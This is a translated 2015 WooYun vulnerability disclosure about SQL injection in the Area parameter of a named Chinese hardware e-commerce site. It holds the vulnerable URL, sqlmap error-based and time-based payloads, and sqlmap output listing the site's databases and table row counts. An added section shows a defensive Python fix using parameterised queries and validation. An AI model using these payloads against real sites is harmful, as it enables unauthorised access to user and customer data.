
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0130445

Title: SQL injection in 全球五金网 (Global Hardware Network, wjw.cn) exposes data across the whole site

Affected vendor: 杭州宏创电子商务有限公司 (Hangzhou Hongchuang E-Commerce Co., Ltd.)

Author: 路人甲

Submitted: 2015-07-30 23:04

Fix deadline: 2015-09-18 09:56

Public disclosure: 2015-09-18 09:56

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-07-30: Details reported to the vendor; awaiting vendor handling
2015-08-04: Vendor confirmed; details visible to the vendor only
2015-08-14: Details disclosed to core white hats and domain experts
2015-08-24: Details disclosed to regular white hats
2015-09-03: Details disclosed to intern white hats
2015-09-18: Details disclosed to the public

Brief description:

SQL injection in 全球五金网 (Global Hardware Network) exposes data across the whole site

Detailed description:

http://club.wjw.cn/Channel/Club/ClubList.aspx?CategoryID=-1&Area=&SortBy=-1 (GET)

Proof of vulnerability:

A pile of data; you know what that means.
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: Area
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: CategoryID=-1&Area=-1576 OR 8606=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(106)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (8606=8606) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(115)+CHAR(109)+CHAR(100)+CHAR(113)))&SortBy=-1
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: CategoryID=-1&Area=-5379 OR 3665=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&SortBy=-1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
available databases [28]:
[*] bmoa
[*] bmoa2
[*] bmoa2012
[*] EN_CMS
[*] EnEnterprise
[*] HC_Cache
[*] HC_CMS
[*] HC_HHR2012
[*] hc_hhr_ddc
[*] hc_hhr_log
[*] HC_HHR_Notice
[*] HC_Recording
[*] HC_SAAS_CRM
[*] HC_ServicePlan
[*] HC_ServicePlan_Log
[*] HC_Tuan
[*] HC_WIKI
[*] kft
[*] master
[*] model
[*] msdb
[*] SpaceBuilder
[*] tempdb
[*] Toy_Cache
[*] Toy_Enterprise
[*] Toy_Member
[*] Toy_OA
[*] wjw_special
Database: SpaceBuilder
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.wl_GalleryPostMetaData | 324462 |
| dbo.wl_Referrals | 232302 |
| dbo.wl_UserPointRecords | 224272 |
| dbo.wl_Urls | 223470 |
| dbo.wl_ItemsForIndex | 192582 |
| dbo.wl_BlogPosts | 56674 |
| dbo.wl_ItemsInUserTags | 56107 |
| dbo.wl_BlogThreads | 55667 |
| dbo.wl_ForumPosts | 34272 |
| dbo.wl_ForumThreads | 25206 |
| dbo.wl_GalleryThreads | 18333 |
| dbo.wl_GalleryPosts | 18176 |
| dbo.wl_EmailQueue | 18031 |
| dbo.wl_GalleryPostAttachments | 17548 |
| dbo.wl_Statistics_User | 16385 |
| dbo.wl_Users | 16385 |
| dbo.wl_PersonUserProfile | 16384 |
| dbo.wl_vw_PersonUsers_FullUser | 16384 |
| dbo.wl_BlogSections | 16380 |
| dbo.wl_GallerySections | 16380 |
| dbo.wl_FileSections | 16379 |
| dbo.wl_UserVisits | 11080 |
| dbo.wl_BlogRatings | 6801 |
| dbo.wl_UserTags | 6748 |
| dbo.wl_SiteTags | 6425 |
| dbo.wl_GalleryPostsInCategories | 6256 |
| dbo.wl_ForumPostAttachments | 5479 |
| dbo.wl_UserLinks | 3061 |
| dbo.wl_UsersOnline | 2464 |
| dbo.wl_GalleryRatings | 2420 |
| dbo.wl_ClubCommendedBlogThreads | 2173 |
| dbo.wl_UserAvatar | 2055 |
| dbo.wl_MessageThreads | 1692 |
| dbo.wl_UserBookmarks | 1330 |
| dbo.wl_ClubCommendedGalleryThreads | 1239 |
| dbo.wl_GalleryPostCategories | 1227 |
| dbo.wl_Bookmarks | 1187 |
| dbo.wl_UserLinkCategories | 1141 |
| dbo.wl_FilePosts | 765 |
| dbo.wl_Contacts | 738 |
| dbo.wl_Friends | 734 |
| dbo.wl_FileThreads | 707 |
| dbo.wl_BookmarkComments | 667 |
| dbo.wl_FilePostAttachments | 636 |
| dbo.wl_UserPrivacySettings | 615 |
| dbo.wl_Advertisings | 605 |
| dbo.wl_ClubMembers | 485 |
| dbo.wl_CommendedItems | 485 |
| dbo.wl_ForumSections | 439 |
| dbo.wl_Areas | 375 |
| dbo.wl_JobSorts | 369 |
| dbo.wl_Censorship | 359 |
| dbo.wl_BlogPostAttachments | 293 |
| dbo.wl_FavoriteUsers | 262 |
| dbo.wl_Clubs | 229 |
| dbo.wl_MemberAppraisements | 158 |
| dbo.wl_BookmarkVotes | 151 |
| dbo.wl_DisallowedNames | 146 |
| dbo.wl_ClubCommendedBookmarks | 138 |
| dbo.wl_EventPosts | 129 |
| dbo.wl_FileRatings | 111 |
| dbo.wl_ClubLinks | 103 |
| dbo.wl_ClubLinkCategories | 86 |
| dbo.wl_ClubCommendedFileThreads | 57 |
| dbo.wl_Events | 56 |
| dbo.wl_Smilies | 55 |
| dbo.wl_UserPointItems | 55 |
| dbo.wl_ForumModerators | 52 |
| dbo.wl_FilePostCategories | 49 |
| dbo.wl_EventPostAttachments | 43 |
| dbo.wl_FilePostsInCategories | 42 |
| dbo.wl_MessageReplies | 41 |
| dbo.wl_PointItems | 29 |
| dbo.wl_UserPrivacySpecialSettings | 29 |
| dbo.wl_UsersInRoles | 28 |
| dbo.wl_ProductPermissions | 17 |
| dbo.wl_EventCategories | 16 |
| dbo.wl_ForumRatings | 15 |
| dbo.wl_Roles | 15 |
| dbo.wl_ClubCategories | 11 |
| dbo.wl_CommendedItemTypes | 9 |
| dbo.wl_CommendedUsers | 8 |
| dbo.wl_CommendedUserTypes | 1 |
| dbo.wl_HotSetting | 1 |
| dbo.wl_PostAttachments_Temp | 1 |
| dbo.wl_SiteSettings | 1 |
| dbo.wl_TaskRunningLog | 1 |
+------------------------------------+---------+
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| dbo.uc | 312662 |
| dbo.amember | 76945 |
| dbo.pworkplan | 66374 |
| dbo.v_workPlan | 66374 |
| dbo.vdeptPlan | 66374 |
| dbo.pworkplan_u | 43849 |
| dbo.note | 18180 |
| dbo.company_uc | 13385 |
| dbo.dnote | 13149 |
| dbo.companyLevelLog | 9521 |
| dbo.dcompany | 8632 |
| dbo.note_c | 8486 |
| dbo.company | 4968 |
| dbo.company_area | 4968 |
| dbo.company_area2 | 4968 |
| dbo.pipeicompany | 4968 |
| dbo.玻璃网所有客户 | 4968 |
| dbo.cantact_company | 4251 |
| dbo.ccontact | 4251 |
| dbo.company_first_contact | 4120 |
| dbo.compnay_ccontact_first | 4120 |
| dbo.dopost | 4120 |
| dbo.dq | 4120 |
| dbo.cuser | 3204 |
| dbo.玻璃网客户联系人联系方式 | 3204 |
| dbo.vipcompany | 2645 |
| dbo.aa | 2499 |
| dbo.bb | 2499 |
| dbo.cc | 2499 |
| dbo.workinfo | 2499 |
| dbo.workinfo_c | 2499 |
| dbo.workinfo_viewforzx | 2499 |
| dbo.area | 2321 |
| dbo.cgsarea | 2321 |
| dbo.vipcompany_user | 1907 |
| dbo.company_vip | 1637 |
| dbo.work_vip | 1462 |
| dbo.nmg_work_yip | 1138 |
| dbo.company_vip_nmg | 1053 |
| dbo.users | 837 |
| dbo.userinfo | 309 |
| dbo.userinfousers | 309 |
| dbo.stnote | 295 |
| dbo.stnote_c | 295 |
| dbo.new | 292 |
| dbo.cservice | 206 |
| dbo.nmg_work_wz | 198 |
| dbo.work_wz | 176 |
| dbo.work_web | 161 |
| dbo.nmg_work_web | 145 |
| dbo.meeting | 125 |
| dbo.buycompany | 123 |
| dbo.buycompanyview | 123 |
| dbo.vc | 111 |
| dbo.v_expireContract | 94 |
| dbo.job | 87 |
| dbo.work_bill | 73 |
| dbo.nmg_work_bill | 62 |
| dbo.vca | 61 |
| dbo.rb | 52 |
| dbo.cservice_c | 43 |
| dbo.getmubiao | 42 |
| dbo.paimin | 42 |
| dbo.paimin1 | 42 |
| dbo.spm | 42 |
| dbo.spm1 | 42 |
| dbo.spmyear | 42 |
| dbo.subclass | 42 |
| dbo.work_bookbill | 42 |
| dbo.usertalk | 41 |
| dbo.duserinfo | 36 |
| dbo.jsb | 35 |
| dbo.c_c_vip22 | 34 |
| dbo.myVipCompany | 34 |
| dbo.service_myvip | 34 |
| dbo.v_myvipcompany | 34 |
| dbo.work_post | 34 |
| dbo.forvipcom | 33 |
| dbo.c_c_vip | 27 |
| dbo.c_c_vip2 | 27 |
| dbo.vip_info | 27 |
| dbo.bm | 26 |
| dbo.nmg_work_post | 25 |
| dbo.match | 23 |
| dbo.question | 21 |
| dbo.wz_info | 16 |
| dbo.VIEW1 | 15 |
| dbo.Yw_type | 12 |
| dbo.filetable | 11 |
| dbo.nmg_work_software | 11 |
| dbo.work_spread | 11 |
| dbo.p1 | 10 |
| dbo.paiminyear | 10 |
| dbo.companyLevel | 9 |
| dbo.leaveNote | 7 |
| dbo.ServiceItem | 7 |
| dbo.webglym | 7 |
| dbo.ym | 7 |
| dbo.zs | 7 |
| dbo.v_leaveNote | 6 |
| dbo.web_info | 6 |
| dbo.classify | 5 |
| dbo.post_info | 5 |
| dbo.newtype | 4 |
| dbo.zxnote | 4 |
| dbo.filetype | 3 |
| dbo.match_buycompany | 3 |
| dbo.web_tg | 3 |
| dbo.webgl | 3 |
| dbo.hometype | 2 |
| dbo.tasksub | 2 |
| dbo.work_billsort | 2 |
| dbo.xsjl | 2 |
| dbo.zhzj | 2 |
| dbo.月业务员业绩统计 | 2 |
| dbo.bill_info | 1 |
| dbo.home | 1 |
| dbo.home_type | 1 |
| dbo.lsxsjl | 1 |
| dbo.snote | 1 |
| dbo.sub | 1 |
| dbo.sypic | 1 |
+----------------------------+---------+

Fix recommendation:

Filter and validate the input parameters.

Copyright notice: when reproducing, please credit 路人甲@乌云 (WooYun)
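The report's one-line fix, "filter the parameters", covers two separate defences, and the sqlmap output above shows why the site needed both: the injectable `Area` value is an integer code (or empty), yet it was spliced into SQL text. The following added example, written by the editor and not taken from the report or from the vendor's code, shows the concatenation pattern that makes `Area=-1576 OR 8606=...` executable, then the two fixes side by side: a strict integer allowlist for the value, and a parameterised query that carries the value separately from the statement. The `Clubs` table, its columns and the sample rows are constructed assumptions; the report only reveals the query-string names. SQLite stands in for SQL Server so the block runs offline; with ADO.NET the same binding is done by adding a `SqlParameter` to the `SqlCommand`.

```python
import sqlite3

# Constructed sample data standing in for the site's club listing
# (table and column names are assumptions, not taken from the report).
CLUBS = [
    (1, "Hardware Traders", 1, 330100),
    (2, "Tool Makers",      2, 310000),
    (3, "Fastener Forum",   1, 440100),
]


def make_db():
    """Build an in-memory table so the example runs without a real server."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Clubs (ClubID INTEGER, Name TEXT, "
        "CategoryID INTEGER, Area INTEGER)"
    )
    conn.executemany("INSERT INTO Clubs VALUES (?, ?, ?, ?)", CLUBS)
    return conn


def list_clubs_unsafe(conn, raw_area):
    """The anti-pattern behind the report: the query-string value is pasted
    into the SQL text, so a value such as "-1 OR 1=1" becomes part of the
    statement and the WHERE clause no longer filters anything."""
    sql = "SELECT ClubID, Name FROM Clubs WHERE Area = " + raw_area
    return conn.execute(sql).fetchall()


def list_clubs_parameterized(conn, raw_area):
    """Fix 1: bind the value instead of splicing it. Whatever the string
    contains, the database sees one opaque value compared against Area."""
    sql = "SELECT ClubID, Name FROM Clubs WHERE Area = ? ORDER BY ClubID"
    return conn.execute(sql, (raw_area,)).fetchall()


def parse_area(raw):
    """Fix 2: input validation ("parameter filtering" in the report's words).
    Area is an integer code or empty (empty means "all areas", as in the
    reported URL), so any other shape is rejected before SQL is involved."""
    if raw == "":
        return None
    if raw.lstrip("-").isdigit():
        return int(raw)
    raise ValueError("Area must be an integer code")


def list_clubs_safe(conn, raw_area):
    """Both fixes together: validate the shape, then bind the typed value."""
    area = parse_area(raw_area)
    if area is None:
        return conn.execute(
            "SELECT ClubID, Name FROM Clubs ORDER BY ClubID"
        ).fetchall()
    return conn.execute(
        "SELECT ClubID, Name FROM Clubs WHERE Area = ? ORDER BY ClubID",
        (area,),
    ).fetchall()


def demo():
    """Run the same constructed tautology through each code path and report
    (rows leaked by the unsafe path, rows returned by binding alone,
    whether validation rejected the value)."""
    conn = make_db()
    payload = "-1 OR 1=1"  # constructed; same shape as the report's "-1576 OR 8606=..."
    leaked = len(list_clubs_unsafe(conn, payload))      # every row comes back
    bound = len(list_clubs_parameterized(conn, payload))  # no row matches the literal string
    try:
        list_clubs_safe(conn, payload)
        rejected = False
    except ValueError:
        rejected = True
    return leaked, bound, rejected


if __name__ == "__main__":
    print(demo())
```

Binding alone already stops the statement from being altered, which is the fix that matters for the error-based and time-based payloads sqlmap reported. The allowlist is worth keeping in front of it anyway: it turns a probe into an explicit error that can be logged and alerted on, rather than a silently empty listing, and it keeps a non-numeric `Area` from ever reaching the database tier.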


Responses

Vendor response:

Severity: Medium

Vulnerability Rank: 7

Confirmed: 2015-08-04 09:55

Vendor reply:

CNVD confirms the vulnerability as described. No direct handling channel with the software vendor (or the website's operating unit) has been established yet; pending claim.

Latest status:

None yet